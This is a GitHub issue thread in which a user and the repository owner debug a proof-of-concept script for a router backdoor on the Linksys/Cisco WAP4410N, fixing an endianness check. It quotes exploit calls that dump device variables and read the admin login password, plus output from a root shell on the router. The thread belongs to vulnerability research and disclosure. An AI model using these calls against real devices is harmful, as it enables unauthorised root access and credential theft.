New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

WAP4410N #11

Closed
matthew1471 opened this Issue Jan 2, 2014 · 24 comments

Comments

Projects
None yet
4 participants
@matthew1471

matthew1471 commented Jan 2, 2014

Listens to port and responds to data with "ScMM" but your Python script doesn't work in its current form.

PID VID: WAP4410N-E V02
Software Version: 2.0.6.1

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

strange... I'll investigate :)
Is there any error/message?

Owner

elvanderb commented Jan 2, 2014

strange... I'll investigate :)
Is there any error/message?

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 2, 2014

I have a PCAP if you want me to e-mail it?

Edit: Actually uploaded it here : http://filebin.ca/17UJu55XztDv/Capture.pcapng

matthew1471 commented Jan 2, 2014

I have a PCAP if you want me to e-mail it?

Edit: Actually uploaded it here : http://filebin.ca/17UJu55XztDv/Capture.pcapng

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

no, thank you, I'll search the firmware.

Owner

elvanderb commented Jan 2, 2014

no, thank you, I'll search the firmware.

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 2, 2014

Okay thanks :-). Let me know if I can help.

matthew1471 commented Jan 2, 2014

Okay thanks :-). Let me know if I can help.

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

The binary in your firmware have all the symbols :) nice
I had a quick look on your version of scfgmgr and it seems to works like the WAG200G one (even if the code is a little bit different).
I'll soon update my code to add the shell could you please test it on your router when it'll be up?

Owner

elvanderb commented Jan 2, 2014

The binary in your firmware have all the symbols :) nice
I had a quick look on your version of scfgmgr and it seems to works like the WAG200G one (even if the code is a little bit different).
I'll soon update my code to add the shell could you please test it on your router when it'll be up?

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 2, 2014

Certainly will, thanks! Let me know when it's up.

matthew1471 commented Jan 2, 2014

Certainly will, thanks! Let me know when it's up.

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

updated, could you test it and past the result?

Owner

elvanderb commented Jan 2, 2014

updated, could you test it and past the result?

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

you can also try some commands like 'ps'

Owner

elvanderb commented Jan 2, 2014

you can also try some commands like 'ps'

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 2, 2014

backdoorolol.py

Traceback (most recent call last):
File "backdoorolol.py", line 41, in
print send_message(s, 7, 'echo "welcome, here is a root shell, have fun"')[1
]
File "backdoorolol.py", line 19, in send_message
assert(sig == 0x53634D4D)
AssertionError

matthew1471 commented Jan 2, 2014

backdoorolol.py

Traceback (most recent call last):
File "backdoorolol.py", line 41, in
print send_message(s, 7, 'echo "welcome, here is a root shell, have fun"')[1
]
File "backdoorolol.py", line 19, in send_message
assert(sig == 0x53634D4D)
AssertionError

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 2, 2014

I added:
print hex(sig)

and got:
0x4d4d6353

Which is backwards... So, endian?

matthew1471 commented Jan 2, 2014

I added:
print hex(sig)

and got:
0x4d4d6353

Which is backwards... So, endian?

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

Yep :)
You're right :)
Your router is big endian, mine is little endian.
This backdoor is really bad coded :D
I'll add some code to detect that, thank you very much for taking the time to report this :)

Owner

elvanderb commented Jan 2, 2014

Yep :)
You're right :)
Your router is big endian, mine is little endian.
This backdoor is really bad coded :D
I'll add some code to detect that, thank you very much for taking the time to report this :)

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

Could you test the last version please?

Owner

elvanderb commented Jan 2, 2014

Could you test the last version please?

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 2, 2014

Needed to bug fix to this line:
elif sig == 0X4D4D6353 :

However it now works! CONFIRMED!

Thank you very much for your time and patience :)

matthew1471 commented Jan 2, 2014

Needed to bug fix to this line:
elif sig == 0X4D4D6353 :

However it now works! CONFIRMED!

Thank you very much for your time and patience :)

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

Oh yes, my bad :)
you are welcome, thank you for your testing and report :)

Owner

elvanderb commented Jan 2, 2014

Oh yes, my bad :)
you are welcome, thank you for your testing and report :)

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 2, 2014

No, thank you :-)

Can you see from the firmware if there's a similar getvar function like with yours?

matthew1471 commented Jan 2, 2014

No, thank you :-)

Can you see from the firmware if there's a similar getvar function like with yours?

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 2, 2014

Owner

you can use the command 1 to dump all the available variables, commands numbers are the same :)
command to use to dump all the vars:
send_message(s, endianness, 1) # dump all the variables

If I wasn't lazy I would code a real PoC with command line parameters :D

Owner

elvanderb commented Jan 2, 2014

you can use the command 1 to dump all the available variables, commands numbers are the same :)
command to use to dump all the vars:
send_message(s, endianness, 1) # dump all the variables

If I wasn't lazy I would code a real PoC with command line parameters :D

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 3, 2014

Ah I kept trying with 2 and forgot about 1.

For 2 on this model it needs to be:
print send_message(s, endianness, 2, "login_password")[1]

The backdoor seems a bit unstable, if you try executing something it doesn't like it disconnects you and I don't seem to be able to close my connections properly (I managed to get it to refuse to let me to connect until I rebooted the AP).

Here's the contents of /bin/

ls /bin/ -l
lrwxrwxrwx 1 0 0 7 watch -> busybox
lrwxrwxrwx 1 0 0 7 vi -> busybox
lrwxrwxrwx 1 0 0 7 umount -> busybox
lrwxrwxrwx 1 0 0 7 touch -> busybox
lrwxrwxrwx 1 0 0 7 sleep -> busybox
lrwxrwxrwx 1 0 0 7 sh -> busybox
lrwxrwxrwx 1 0 0 7 sed -> busybox
lrwxrwxrwx 1 0 0 7 rm -> busybox
lrwxrwxrwx 1 0 0 7 pwd -> busybox
lrwxrwxrwx 1 0 0 7 ps -> busybox
lrwxrwxrwx 1 0 0 7 ping6 -> busybox
lrwxrwxrwx 1 0 0 7 ping2file -> busybox
lrwxrwxrwx 1 0 0 7 ping -> busybox
lrwxrwxrwx 1 0 0 7 mv -> busybox
lrwxrwxrwx 1 0 0 7 mount -> busybox
lrwxrwxrwx 1 0 0 7 mkdir -> busybox
lrwxrwxrwx 1 0 0 7 ls -> busybox
lrwxrwxrwx 1 0 0 7 login -> busybox
lrwxrwxrwx 1 0 0 7 ln -> busybox
lrwxrwxrwx 1 0 0 7 kill -> busybox
lrwxrwxrwx 1 0 0 7 hostname -> busybox
lrwxrwxrwx 1 0 0 7 grep -> busybox
lrwxrwxrwx 1 0 0 7 fgrep -> busybox
lrwxrwxrwx 1 0 0 7 egrep -> busybox
lrwxrwxrwx 1 0 0 7 echo -> busybox
lrwxrwxrwx 1 0 0 7 dmesg -> busybox
lrwxrwxrwx 1 0 0 7 df -> busybox
lrwxrwxrwx 1 0 0 7 date -> busybox
lrwxrwxrwx 1 0 0 7 cp -> busybox
lrwxrwxrwx 1 0 0 7 chmod -> busybox
lrwxrwxrwx 1 0 0 7 cat -> busybox
-rwxr-xr-x 1 0 0 526260 busybox
lrwxrwxrwx 1 0 0 7 ash -> busybox

and the supported features of busybox:

busybox
BusyBox v1.1.0 (2011.10.27-14:28+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions:
[, [[, ash, brctl, busybox, cat, chmod, cp, cut, date, df, dmesg,
echo, egrep, fgrep, free, ftpget, ftpput, grep, hostname, ifconfig,
init, insmod, kill, killall, ln, login, ls, lsmod, mkdir, mount,
mv, passwd, ping, ping2file, ping6, ps, pwd, reboot, rm, rmmod,
route, sed, sh, sleep, tail, telnetd, test, tftp, top, touch,
umount, vi, watch, which, xargs

matthew1471 commented Jan 3, 2014

Ah I kept trying with 2 and forgot about 1.

For 2 on this model it needs to be:
print send_message(s, endianness, 2, "login_password")[1]

The backdoor seems a bit unstable, if you try executing something it doesn't like it disconnects you and I don't seem to be able to close my connections properly (I managed to get it to refuse to let me to connect until I rebooted the AP).

Here's the contents of /bin/

ls /bin/ -l
lrwxrwxrwx 1 0 0 7 watch -> busybox
lrwxrwxrwx 1 0 0 7 vi -> busybox
lrwxrwxrwx 1 0 0 7 umount -> busybox
lrwxrwxrwx 1 0 0 7 touch -> busybox
lrwxrwxrwx 1 0 0 7 sleep -> busybox
lrwxrwxrwx 1 0 0 7 sh -> busybox
lrwxrwxrwx 1 0 0 7 sed -> busybox
lrwxrwxrwx 1 0 0 7 rm -> busybox
lrwxrwxrwx 1 0 0 7 pwd -> busybox
lrwxrwxrwx 1 0 0 7 ps -> busybox
lrwxrwxrwx 1 0 0 7 ping6 -> busybox
lrwxrwxrwx 1 0 0 7 ping2file -> busybox
lrwxrwxrwx 1 0 0 7 ping -> busybox
lrwxrwxrwx 1 0 0 7 mv -> busybox
lrwxrwxrwx 1 0 0 7 mount -> busybox
lrwxrwxrwx 1 0 0 7 mkdir -> busybox
lrwxrwxrwx 1 0 0 7 ls -> busybox
lrwxrwxrwx 1 0 0 7 login -> busybox
lrwxrwxrwx 1 0 0 7 ln -> busybox
lrwxrwxrwx 1 0 0 7 kill -> busybox
lrwxrwxrwx 1 0 0 7 hostname -> busybox
lrwxrwxrwx 1 0 0 7 grep -> busybox
lrwxrwxrwx 1 0 0 7 fgrep -> busybox
lrwxrwxrwx 1 0 0 7 egrep -> busybox
lrwxrwxrwx 1 0 0 7 echo -> busybox
lrwxrwxrwx 1 0 0 7 dmesg -> busybox
lrwxrwxrwx 1 0 0 7 df -> busybox
lrwxrwxrwx 1 0 0 7 date -> busybox
lrwxrwxrwx 1 0 0 7 cp -> busybox
lrwxrwxrwx 1 0 0 7 chmod -> busybox
lrwxrwxrwx 1 0 0 7 cat -> busybox
-rwxr-xr-x 1 0 0 526260 busybox
lrwxrwxrwx 1 0 0 7 ash -> busybox

and the supported features of busybox:

busybox
BusyBox v1.1.0 (2011.10.27-14:28+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions:
[, [[, ash, brctl, busybox, cat, chmod, cp, cut, date, df, dmesg,
echo, egrep, fgrep, free, ftpget, ftpput, grep, hostname, ifconfig,
init, insmod, kill, killall, ln, login, ls, lsmod, mkdir, mount,
mv, passwd, ping, ping2file, ping6, ps, pwd, reboot, rm, rmmod,
route, sed, sh, sleep, tail, telnetd, test, tftp, top, touch,
umount, vi, watch, which, xargs

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 3, 2014

Owner

Nice, thank you :)
I'm updating the PoC to make it a little bit more user friendly ;)

Owner

elvanderb commented Jan 3, 2014

Nice, thank you :)
I'm updating the PoC to make it a little bit more user friendly ;)

@matthew1471

This comment has been minimized.

Show comment
Hide comment
@matthew1471

matthew1471 Jan 3, 2014

Just tried the new version, works well. Thanks for researching this and helping to make the product safer!

Just wondering but given our endian discovery, your list of "Backdoor is not working in", do these need to be re-checked with the new code?

matthew1471 commented Jan 3, 2014

Just tried the new version, works well. Thanks for researching this and helping to make the product safer!

Just wondering but given our endian discovery, your list of "Backdoor is not working in", do these need to be re-checked with the new code?

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 3, 2014

Owner

I don't think so, people reported routers with closed ports.
Thank you for your testing :) I just updated a new version that fix some bug

Owner

elvanderb commented Jan 3, 2014

I don't think so, people reported routers with closed ports.
Thank you for your testing :) I just updated a new version that fix some bug

@matthew1471

This comment has been minimized.

Show comment
Hide comment

matthew1471 commented Jan 3, 2014

@elvanderb

This comment has been minimized.

Show comment
Hide comment
@elvanderb

elvanderb Jan 3, 2014

Owner

woops, fixed :)

Owner

elvanderb commented Jan 3, 2014

woops, fixed :)

@avsavchenko

This comment has been minimized.

Show comment
Hide comment
@avsavchenko

avsavchenko Jan 23, 2014

Not works with new firmware 2.0.7.4

avsavchenko commented Jan 23, 2014

Not works with new firmware 2.0.7.4

@an3k

This comment has been minimized.

Show comment
Hide comment
@an3k

an3k Jan 24, 2014

WAP4410N (also known as WAP4410N-E, it's the same device) Hardware Revision 01 and 02 are Linksys (in fact "Linksys by Cisco") products, Rev 03 is pure Cisco.

Linksys was never a company on it's own. It was just a "brand" name Cisco used for their SOHO products.

an3k commented Jan 24, 2014

WAP4410N (also known as WAP4410N-E, it's the same device) Hardware Revision 01 and 02 are Linksys (in fact "Linksys by Cisco") products, Rev 03 is pure Cisco.

Linksys was never a company on it's own. It was just a "brand" name Cisco used for their SOHO products.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment